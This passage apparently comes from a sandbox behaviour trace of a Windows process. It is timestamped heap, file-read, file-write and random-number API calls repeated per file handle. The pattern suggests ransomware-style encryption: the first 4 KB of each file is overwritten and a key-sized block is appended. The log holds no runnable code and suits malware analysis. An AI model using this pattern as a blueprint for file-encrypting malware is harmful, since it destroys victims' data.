[0080.453] GetProcessHeap () returned 0x4f10000 [0080.453] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.453] GetProcessHeap () returned 0x4f10000 [0080.453] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0080.453] GetProcessHeap () returned 0x4f10000 [0080.453] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0080.453] GetProcessHeap () returned 0x4f10000 [0080.453] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0080.453] GetProcessHeap () returned 0x4f10000 [0080.453] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0080.453] SetFilePointerEx (in: hFile=0x85c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.454] WriteFile (in: hFile=0x85c, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0080.454] WriteFile (in: hFile=0x85c, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0080.479] GetProcessHeap () returned 0x4f10000 [0080.490] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0080.516] GetProcessHeap () returned 0x4f10000 [0080.516] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0080.517] GetProcessHeap () returned 0x4f10000 [0080.517] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0080.517] CloseHandle (hObject=0x85c) returned 1 [0080.518] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 56 [0080.518] SetFilePointerEx (in: hFile=0x860, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.518] ReadFile (in: hFile=0x860, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0080.519] SetFilePointerEx (in: hFile=0x860, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.519] GetProcessHeap () returned 0x4f10000 [0080.519] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0080.519] GetProcessHeap () returned 0x4f10000 [0080.519] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0080.519] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0080.519] GetProcessHeap () returned 0x4f10000 [0080.519] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0080.519] ReadFile (in: hFile=0x860, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0080.566] SetFilePointerEx (in: hFile=0x860, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.566] WriteFile (in: hFile=0x860, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0080.567] GetProcessHeap () returned 0x4f10000 [0080.567] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0080.567] GetProcessHeap () returned 0x4f10000 [0080.567] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0080.567] GetProcessHeap () returned 0x4f10000 [0080.567] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0080.567] GetProcessHeap () returned 0x4f10000 [0080.567] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0080.567] GetProcessHeap () returned 0x4f10000 [0080.567] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0080.567] GetProcessHeap () returned 0x4f10000 [0080.567] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0080.567] GetProcessHeap () returned 0x4f10000 [0080.567] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.567] GetProcessHeap () returned 0x4f10000 [0080.567] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.567] GetProcessHeap () returned 0x4f10000 [0080.567] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.567] GetProcessHeap () returned 0x4f10000 [0080.567] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.567] GetProcessHeap () returned 0x4f10000 [0080.567] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.567] GetProcessHeap () returned 0x4f10000 [0080.567] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.567] GetProcessHeap () returned 0x4f10000 [0080.567] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.567] GetProcessHeap () returned 0x4f10000 [0080.567] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.567] GetProcessHeap () returned 0x4f10000 [0080.567] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.567] GetProcessHeap () returned 0x4f10000 [0080.567] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.567] GetProcessHeap () returned 0x4f10000 [0080.567] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.567] GetProcessHeap () returned 0x4f10000 [0080.567] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.568] GetProcessHeap () returned 0x4f10000 [0080.568] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.568] GetProcessHeap () returned 0x4f10000 [0080.568] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.568] GetProcessHeap () returned 0x4f10000 [0080.568] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.568] GetProcessHeap () returned 0x4f10000 [0080.568] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.568] GetProcessHeap () returned 0x4f10000 [0080.568] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.568] GetProcessHeap () returned 0x4f10000 [0080.568] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.568] GetProcessHeap () returned 0x4f10000 [0080.568] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.568] GetProcessHeap () returned 0x4f10000 [0080.568] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.568] GetProcessHeap () returned 0x4f10000 [0080.568] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.568] GetProcessHeap () returned 0x4f10000 [0080.568] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.568] GetProcessHeap () returned 0x4f10000 [0080.568] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.568] GetProcessHeap () returned 0x4f10000 [0080.568] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.568] GetProcessHeap () returned 0x4f10000 [0080.568] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.568] GetProcessHeap () returned 0x4f10000 [0080.568] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.568] GetProcessHeap () returned 0x4f10000 [0080.568] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.568] GetProcessHeap () returned 0x4f10000 [0080.568] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.568] GetProcessHeap () returned 0x4f10000 [0080.568] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.568] GetProcessHeap () returned 0x4f10000 [0080.568] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.568] GetProcessHeap () returned 0x4f10000 [0080.568] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.568] GetProcessHeap () returned 0x4f10000 [0080.569] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.569] GetProcessHeap () returned 0x4f10000 [0080.569] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0080.569] GetProcessHeap () returned 0x4f10000 [0080.569] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.569] GetProcessHeap () returned 0x4f10000 [0080.569] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0080.569] GetProcessHeap () returned 0x4f10000 [0080.569] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0080.569] GetProcessHeap () returned 0x4f10000 [0080.569] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0080.569] GetProcessHeap () returned 0x4f10000 [0080.569] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0080.569] GetProcessHeap () returned 0x4f10000 [0080.569] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0080.569] GetProcessHeap () returned 0x4f10000 [0080.569] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0080.569] GetProcessHeap () returned 0x4f10000 [0080.569] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.569] GetProcessHeap () returned 0x4f10000 [0080.569] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0080.569] GetProcessHeap () returned 0x4f10000 [0080.569] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.569] GetProcessHeap () returned 0x4f10000 [0080.569] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.569] GetProcessHeap () returned 0x4f10000 [0080.569] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.569] GetProcessHeap () returned 0x4f10000 [0080.569] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.569] GetProcessHeap () returned 0x4f10000 [0080.569] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.569] GetProcessHeap () returned 0x4f10000 [0080.569] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.570] GetProcessHeap () returned 0x4f10000 [0080.570] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.570] GetProcessHeap () returned 0x4f10000 [0080.570] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.570] GetProcessHeap () returned 0x4f10000 [0080.570] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.570] GetProcessHeap () returned 0x4f10000 [0080.570] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.570] GetProcessHeap () returned 0x4f10000 [0080.570] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.570] GetProcessHeap () returned 0x4f10000 [0080.570] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.570] GetProcessHeap () returned 0x4f10000 [0080.570] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.570] GetProcessHeap () returned 0x4f10000 [0080.570] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.570] GetProcessHeap () returned 0x4f10000 [0080.570] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.570] GetProcessHeap () returned 0x4f10000 [0080.570] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.570] GetProcessHeap () returned 0x4f10000 [0080.570] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.570] GetProcessHeap () returned 0x4f10000 [0080.570] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.570] GetProcessHeap () returned 0x4f10000 [0080.570] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.570] GetProcessHeap () returned 0x4f10000 [0080.570] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.570] GetProcessHeap () returned 0x4f10000 [0080.571] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.571] GetProcessHeap () returned 0x4f10000 [0080.571] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.571] GetProcessHeap () returned 0x4f10000 [0080.571] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.571] GetProcessHeap () returned 0x4f10000 [0080.571] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.571] GetProcessHeap () returned 0x4f10000 [0080.571] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0080.571] GetProcessHeap () returned 0x4f10000 [0080.571] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.571] GetProcessHeap () returned 0x4f10000 [0080.571] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0080.571] GetProcessHeap () returned 0x4f10000 [0080.571] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0080.571] GetProcessHeap () returned 0x4f10000 [0080.571] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0080.571] GetProcessHeap () returned 0x4f10000 [0080.571] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0080.571] SetFilePointerEx (in: hFile=0x860, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.571] WriteFile (in: hFile=0x860, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0080.571] WriteFile (in: hFile=0x860, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0080.571] GetProcessHeap () returned 0x4f10000 [0080.571] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0080.571] GetProcessHeap () returned 0x4f10000 [0080.571] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0080.571] GetProcessHeap () returned 0x4f10000 [0080.572] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0080.572] CloseHandle (hObject=0x860) returned 1 [0080.572] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 57 [0080.572] SetFilePointerEx (in: hFile=0x864, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.572] ReadFile (in: hFile=0x864, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0080.572] SetFilePointerEx (in: hFile=0x864, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.573] GetProcessHeap () returned 0x4f10000 [0080.573] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0080.573] GetProcessHeap () returned 0x4f10000 [0080.573] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0080.573] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0080.573] GetProcessHeap () returned 0x4f10000 [0080.573] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0080.573] ReadFile (in: hFile=0x864, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0080.620] SetFilePointerEx (in: hFile=0x864, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.620] WriteFile (in: hFile=0x864, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0080.620] GetProcessHeap () returned 0x4f10000 [0080.620] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0080.620] GetProcessHeap () returned 0x4f10000 [0080.620] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0080.620] GetProcessHeap () returned 0x4f10000 [0080.620] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0080.620] GetProcessHeap () returned 0x4f10000 [0080.621] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0080.621] GetProcessHeap () returned 0x4f10000 [0080.621] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0080.621] GetProcessHeap () returned 0x4f10000 [0080.621] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0080.621] GetProcessHeap () returned 0x4f10000 [0080.621] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.621] GetProcessHeap () returned 0x4f10000 [0080.621] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.621] GetProcessHeap () returned 0x4f10000 [0080.621] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.621] GetProcessHeap () returned 0x4f10000 [0080.621] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.621] GetProcessHeap () returned 0x4f10000 [0080.621] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.621] GetProcessHeap () returned 0x4f10000 [0080.621] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.621] GetProcessHeap () returned 0x4f10000 [0080.621] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.621] GetProcessHeap () returned 0x4f10000 [0080.621] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.621] GetProcessHeap () returned 0x4f10000 [0080.621] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.621] GetProcessHeap () returned 0x4f10000 [0080.621] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.621] GetProcessHeap () returned 0x4f10000 [0080.621] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.621] GetProcessHeap () returned 0x4f10000 [0080.621] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.621] GetProcessHeap () returned 0x4f10000 [0080.621] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.621] GetProcessHeap () returned 0x4f10000 [0080.622] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.622] GetProcessHeap () returned 0x4f10000 [0080.622] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.622] GetProcessHeap () returned 0x4f10000 [0080.622] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.622] GetProcessHeap () returned 0x4f10000 [0080.622] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.622] GetProcessHeap () returned 0x4f10000 [0080.622] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.622] GetProcessHeap () returned 0x4f10000 [0080.622] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.622] GetProcessHeap () returned 0x4f10000 [0080.622] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.622] GetProcessHeap () returned 0x4f10000 [0080.622] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.622] GetProcessHeap () returned 0x4f10000 [0080.622] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.622] GetProcessHeap () returned 0x4f10000 [0080.622] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.622] GetProcessHeap () returned 0x4f10000 [0080.622] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.622] GetProcessHeap () returned 0x4f10000 [0080.622] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.622] GetProcessHeap () returned 0x4f10000 [0080.622] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.622] GetProcessHeap () returned 0x4f10000 [0080.622] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.622] GetProcessHeap () returned 0x4f10000 [0080.622] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.622] GetProcessHeap () returned 0x4f10000 [0080.623] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.623] GetProcessHeap () returned 0x4f10000 [0080.623] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.623] GetProcessHeap () returned 0x4f10000 [0080.623] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.623] GetProcessHeap () returned 0x4f10000 [0080.623] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.623] GetProcessHeap () returned 0x4f10000 [0080.623] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0080.623] GetProcessHeap () returned 0x4f10000 [0080.623] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.623] GetProcessHeap () returned 0x4f10000 [0080.623] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0080.623] GetProcessHeap () returned 0x4f10000 [0080.623] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0080.623] GetProcessHeap () returned 0x4f10000 [0080.623] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0080.623] GetProcessHeap () returned 0x4f10000 [0080.623] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0080.623] GetProcessHeap () returned 0x4f10000 [0080.623] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0080.623] GetProcessHeap () returned 0x4f10000 [0080.623] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0080.623] GetProcessHeap () returned 0x4f10000 [0080.623] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.623] GetProcessHeap () returned 0x4f10000 [0080.623] HeapFree (in: 